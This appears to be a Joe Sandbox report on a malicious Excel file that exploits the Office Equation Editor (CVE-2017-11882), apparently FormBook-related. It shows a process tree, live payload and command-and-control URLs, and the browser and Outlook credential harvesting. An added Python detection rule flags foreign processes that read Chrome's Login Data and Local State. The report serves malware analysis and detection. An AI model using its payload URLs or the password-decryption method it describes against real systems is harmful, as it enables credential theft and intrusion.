Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E9553A sqlite3_step,sqlite3_bind_int,sqlite3_malloc,memcmp,sqlite3_finalize,sqlite3_free,sqlite3_prepare_v2,sqlite3_free,sqlite3_free,sqlite3_step,sqlite3_reset,sqlite3_reset,sqlite3_stricmp,sqlite3_malloc,sqlite3_step,sqlite3_reset,8_2_61E9553A
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E037E6 sqlite3_bind_parameter_name,8_2_61E037E6
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E037D4 sqlite3_bind_parameter_count,8_2_61E037D4
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D76E sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E2D76E
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D72A sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E2D72A
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E1572D sqlite3_bind_parameter_index,8_2_61E1572D
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E036FA sqlite3_value_frombind,8_2_61E036FA
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D6AD sqlite3_bind_pointer,sqlite3_mutex_leave,8_2_61E2D6AD
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D67C sqlite3_bind_null,sqlite3_mutex_leave,8_2_61E2D67C
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D656 sqlite3_bind_int,sqlite3_bind_int64,8_2_61E2D656
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D607 sqlite3_bind_int64,sqlite3_mutex_leave,8_2_61E2D607
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D99D sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,8_2_61E2D99D
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D96E sqlite3_bind_text16,8_2_61E2D96E
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D932 sqlite3_bind_text64,8_2_61E2D932
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D903 sqlite3_bind_text,8_2_61E2D903
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D8D4 sqlite3_bind_blob64,8_2_61E2D8D4
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D8A5 sqlite3_bind_blob,8_2_61E2D8A5
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E95B00 sqlite3_exec,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_exec,8_2_61E95B00
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2DA9D sqlite3_bind_value,8_2_61E2DA9D
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E12EEA sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,8_2_61E12EEA
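The credential-access lines show msinfo32.exe, not Chrome and not Outlook, opening the four Chrome profile files and walking the MAPI profile sections under Windows Messaging Subsystem\Profiles\Outlook. The pairing of files is what matters: Login Data holds the saved passwords as AES-256-GCM blobs in the SQLite table logins, Local State holds the DPAPI-wrapped AES key that decrypts them, so one process reading both can recover every saved password offline; the sqlite3_prepare_v2 / sqlite3_step / sqlite3_bind_* functions listed above are that walk of the database, and the behavior graph shows msinfo32.exe contacting www.sqlite.org and dropping sqlite3.dll into %Temp% to do it. On the Outlook side, 9375CFF0413111d3B88A00104B2A6676 is the profile section that holds the configured mail accounts and its numbered subkeys are the individual accounts. The Python below is an added detection example, not code from the report: it applies an "only the owning application touches its credential store" rule to lines copied from the export (a " | " separator is also accepted) plus one constructed benign line, and grades the Chrome finding higher when key and ciphertext were both read. The owner allowlist is the editor's simplification; a production rule would cover Chromium derivatives and Outlook's own helper processes. One caveat on paths: the report shows Local State under the Default profile directory, while Chrome keeps it in the User Data root; the rule matches on the User Data prefix, so it fires either way.

```python
import ntpath
import re
from collections import defaultdict

# Added detection example, not part of the Joe Sandbox report: flags credential
# stores opened by anything other than their owning application and records
# what each artifact gives an attacker.

CHROME_ARTIFACTS = {
    "Login Data": "saved logins: SQLite table logins, password_value is an AES-256-GCM blob (v10 prefix)",
    "Local State": "JSON with os_crypt.encrypted_key, the DPAPI-wrapped AES key for those blobs",
    "Web Data": "autofill profiles and saved payment cards",
    "Cookies": "session cookies (account access without any password)",
}
OUTLOOK_ACCOUNTS_SECTION = "9375CFF0413111d3B88A00104B2A6676"  # MAPI section holding the mail accounts
OWNERS = {"chrome": {"chrome.exe"}, "outlook": {"outlook.exe"}}  # editor's simplified allowlist

SEP = r"(?: \| )?"  # tolerate a " | " separator between process and event
FILE_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)" + SEP + r"File opened: (?P<path>.+?)(?:Jump to behavior)?$")
KEY_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)" + SEP + r"Key opened: (?P<key>.+?)(?:Jump to behavior)?$")
PROFILE_RE = re.compile(
    r"Windows Messaging Subsystem\\Profiles\\[^\\]+\\(?P<section>[0-9A-Fa-f]{32})(?:\\(?P<account>[0-9A-Fa-f]+))?")

# Lines copied from the report, plus one constructed benign control at the end.
SAMPLE = [
    r"Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior",
    r"Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior",
    r"Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior",
    r"Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior",
    r"Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior",
    # constructed: the owning browser reading its own store must not alert
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
]


def classify(line):
    """(process, store, artifact, role) for a credential-store access, else None."""
    if m := FILE_RE.match(line):
        proc, path = ntpath.basename(m["proc"]).lower(), m["path"]
        if "\\Google\\Chrome\\User Data\\" in path:
            name = ntpath.basename(path)
            return proc, "chrome", name, CHROME_ARTIFACTS.get(name, "other profile file")
    elif m := KEY_RE.match(line):
        proc, key = ntpath.basename(m["proc"]).lower(), m["key"]
        if s := PROFILE_RE.search(key):
            artifact = s["section"] if not s["account"] else f"{s['section']}\\{s['account']}"
            role = "mail account settings" if s["section"].upper() == OUTLOOK_ACCOUNTS_SECTION.upper() else "profile section"
            return proc, "outlook", artifact, role
        if "Windows Messaging Subsystem\\Profiles" in key:
            return proc, "outlook", "profile root", "profile enumeration"
    return None


def detect(lines):
    seen = defaultdict(lambda: defaultdict(set))  # process -> store -> artifacts
    for line in lines:
        hit = classify(line)
        if hit and hit[0] not in OWNERS[hit[1]]:
            seen[hit[0]][hit[1]].add(hit[2])
    findings = []
    for proc, stores in seen.items():
        for store, arts in stores.items():
            # key and ciphertext read by the same foreign process: passwords recoverable offline
            full = store == "chrome" and {"Login Data", "Local State"} <= arts
            findings.append({"process": proc, "store": store, "artifacts": sorted(arts),
                             "severity": "critical" if full else "high"})
    return sorted(findings, key=lambda f: (f["process"], f["store"]))


if __name__ == "__main__":
    for f in detect(SAMPLE):
        print(f"{f['severity']}: {f['process']} read {f['store']} {f['artifacts']}")
```

In live telemetry the same rule runs over Sysmon file-create/registry events or an EDR's file-open stream; the one thing to preserve from this version is the severity step-up, because a process that reads Login Data without Local State still needs DPAPI access in the victim's context, whereas reading both lets the attacker finish the decryption anywhere.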
MITRE ATT&CK Matrix

Numbers in parentheses are the count of matched signatures for that technique; cells without a count are unmatched entries of the matrix.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (1) | Valid Accounts (2) | Native API (3) | Scripting (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (1) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (6) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Exploitation for Client Execution (33) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (21) | Account Discovery (1) | Remote Desktop Protocol | Browser Session Hijacking (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Valid Accounts (2) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Data from Local System (1) | Non-Application Layer Protocol (5) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Valid Accounts (2) | Obfuscated Files or Information (2) | NTDS | System Information Discovery (128) | Distributed Component Object Model | Email Collection (1) | Application Layer Protocol (6) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Access Token Manipulation (21) | Install Root Certificate (1) | LSA Secrets | Security Software Discovery (24) | SSH | Input Capture (21) | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Process Injection (312) | DLL Side-Loading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (2) | VNC | Clipboard Data (3) | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (1) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts (2) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Modify Registry (1) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Virtualization/Sandbox Evasion (2) | Network Sniffing | Remote System Discovery (1) | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Access Token Manipulation (21) | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Process Injection (312) | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Behavior Graph ID: 1539299 | Sample: IND24072113.xlsx | Start date: 22/10/2024 | Architecture: WINDOWS | Score: 100

Process tree recovered from the behavior graph (the graphic itself is not reproduced):

IND24072113.xlsx
    signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 11 other signatures
    started EXCEL.EXE
        dropped: C:\Users\user\Desktop\~$IND24072113.xlsx (data)
        started EQNEDT32.EXE
            network: timurtrading.my 192.3.255.145, ports 443, 49161, 49162 (AS-COLOCROSSINGUS, United States)
            dropped: C:\Users\user\AppData\Roaming\word.exe (PE32); C:\Users\user\AppData\...\kontempt2.1[1].exe (PE32)
            signatures: Installs new ROOT certificates; Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            started word.exe
                signatures: Machine Learning detection for dropped file; Writes to foreign memory regions; Maps a DLL or memory area into another process; 2 other signatures
                started svchost.exe
                    signatures: Maps a DLL or memory area into another process
                    injected uAjPOONiWk.exe
                        signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
                        started msinfo32.exe
                            network: www.sqlite.org 45.33.6.223, ports 49164, 80 (LINODE-APLinodeLLCUS, United States)
                            dropped: C:\Users\user\AppData\Local\...\sqlite3.dll (PE32)
                            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection)
                            injected uAjPOONiWk.exe
                                network: www.myprefpal.xyz; myprefpal.xyz 3.33.130.190, ports 49169, 49170, 49171 (AMAZONEXPANSIONGB, United States); 4 other IPs or domains
                                signatures: Found direct / indirect Syscall (likely to bypass EDR); Performs DNS queries to domains with low reputation (www.myprefpal.xyz)
                            started firefox.exe

Source | Detection | Scanner | Label
IND24072113.xlsx | 68% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
IND24072113.xlsx | 100% | Avira | EXP/CVE-2017-11882.Gen

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\word.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\sqlite3.dll | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
http://www.sqlite.org/copyright.html. | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.75e296qdx.top | 185.196.10.234 | true | false | | unknown
myprefpal.xyz | 3.33.130.190 | true | true | | unknown
timurtrading.my | 192.3.255.145 | true | true | | unknown
www.sqlite.org | 45.33.6.223 | true | false | | unknown
www.omnibizlux.biz | 167.172.133.32 | true | false | | unknown
jilifish.win | 15.197.148.33 | true | false | | unknown
www.myprefpal.xyz | unknown | unknown | true | | unknown
www.jilifish.win | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.omnibizlux.biz/8pmv/?DtMH=kxoTeT1hyx&2PV85pl=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Ca | false | | unknown
http://www.75e296qdx.top/quvp/?2PV85pl=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&DtMH=kxoTeT1hyx | false | | unknown
https://timurtrading.my/kontempt2.1.exe | true | | unknown
http://www.myprefpal.xyz/2xrt/?2PV85pl=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&DtMH=kxoTeT1hyx | false | | unknown
http://www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip | false | | unknown
http://www.jilifish.win/to3j/ | false | | unknown
http://www.75e296qdx.top/quvp/ | false | | unknown
http://timurtrading.my/kontempt2.1.exe | true | | unknown
http://www.myprefpal.xyz/2xrt/ | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.dr | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.dr | false | URL Reputation: safe | unknown
https://timurtrading.my/kontempt2.1.exec | EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.entrust.net/server1.crl0 | EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.entrust.net03 | EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.dr | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_flash | msinfo32.exe, 00000008.00000003.541112304.0000000005F7F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://timurtrading.my/kontempt2.1.exeppC: | EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.diginotar.nl/cps/pkioverheid0 | EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.dr | false | | unknown
http://timurtrading.my/kontempt2.1.exee | EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://timurtrading.my/kontempt2.1.exeroC: | EQNEDT32.EXE, 00000002.00000002.427203634.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.426323426.00000000006DC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com/favicon.ico | 7yj1259-.8.dr | false | | unknown
https://ac.ecosia.org/autocomplete?q= | msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.dr | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.jilifish.win | uAjPOONiWk.exe, 00000009.00000002.639998204.0000000005095000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
https://timurtrading.my/ | EQNEDT32.EXE, 00000002.00000003.427086448.0000000000650000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427188921.0000000000651000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.entrust.net0D | EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.dr | false | URL Reputation: safe | unknown
http://crl.entrust.net/2048ca.crl0 | EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sqlite.org/copyright.html. | msinfo32.exe, 00000008.00000002.640641688.0000000061ED1000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr | false | URL Reputation: safe | unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.dr | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
15.197.148.33 | jilifish.win | United States | 7430 | TANDEMUS | false
45.33.6.223 | www.sqlite.org | United States | 63949 | LINODE-APLinodeLLCUS | false
167.172.133.32 | www.omnibizlux.biz | United States | 14061 | DIGITALOCEAN-ASNUS | false
192.3.255.145 | timurtrading.my | United States | 36352 | AS-COLOCROSSINGUS | true
185.196.10.234 | www.75e296qdx.top | Switzerland | 42624 | SIMPLECARRIERCH | false
3.33.130.190 | myprefpal.xyz | United States | 8987 | AMAZONEXPANSIONGB | true
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1539299
                                                            Start date and time:2024-10-22 14:59:16 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 6s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:11
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:IND24072113.xlsx
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winXLSX@10/10@7/6
                                                            EGA Information:
                                                            • Successful, ratio: 80%
                                                            HCA Information:
                                                            • Successful, ratio: 82%
                                                            • Number of executed functions: 49
                                                            • Number of non-executed functions: 324
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .xlsx
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Attach to Office via COM
                                                            • Active ActiveX Object
                                                            • Scroll down
                                                            • Close Viewer
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: IND24072113.xlsx
Time | Type | Description
09:00:42 | API Interceptor | 126x Sleep call for process: EQNEDT32.EXE modified
09:01:33 | API Interceptor | 559x Sleep call for process: uAjPOONiWk.exe modified
09:01:38 | API Interceptor | 116519x Sleep call for process: msinfo32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
15.197.148.33 | ekte.exe | malicious | FormBook | www.childlesscatlady.today/0l08/
15.197.148.33 | IND24072113_1.xlsx | malicious | Unknown | www.jilifish.win/to3j/
15.197.148.33 | AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe | malicious | FormBook | www.1clickw2.net/9bnb/
15.197.148.33 | BILL OF LADDING.exe | malicious | FormBook | www.ethetf.digital/m7sk/
15.197.148.33 | LgzpILNkS2.exe | malicious | FormBook | www.warriorsyndrome.net/yaso/
15.197.148.33 | firmware.armv5l.elf | malicious | Unknown | 15.197.148.33/
15.197.148.33 | firmware.mipsel.elf | malicious | Unknown | 15.197.148.33/
15.197.148.33 | firmware.sh4.elf | malicious | Unknown | 15.197.148.33/
15.197.148.33 | firmware.x86_64.elf | malicious | Unknown | 15.197.148.33/
15.197.148.33 | fptlVDDPkS.dll | malicious | Quasar | freegeoip.net/xml/
45.33.6.223 | ekte.exe | malicious | FormBook | www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
45.33.6.223 | IND24072113_1.xlsx | malicious | Unknown | www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
45.33.6.223 | SOA-INV0892024.xla.xlsx | malicious | FormBook | www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
45.33.6.223 | New PO-RFQ14101524.xla.xlsx | malicious | FormBook | www.sqlite.org/2019/sqlite-dll-win32-x86-3280000.zip
45.33.6.223 | BILL OF LADDING.exe | malicious | FormBook | www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
45.33.6.223 | FvYlbhvZrZ.rtf | malicious | FormBook | www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
45.33.6.223 | SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx | malicious | FormBook | www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
45.33.6.223 | LgzpILNkS2.exe | malicious | FormBook | www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
45.33.6.223 | ncOLm62YLB.exe | malicious | FormBook | www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
45.33.6.223 | RFQ-TECMARKQATAR PO33109.xlsx | malicious | FormBook | www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.omnibizlux.biz | IND24072113_1.xlsx | malicious | Unknown | 167.172.133.32
www.sqlite.org | ekte.exe | malicious | FormBook | 45.33.6.223
www.sqlite.org | IND24072113_1.xlsx | malicious | Unknown | 45.33.6.223
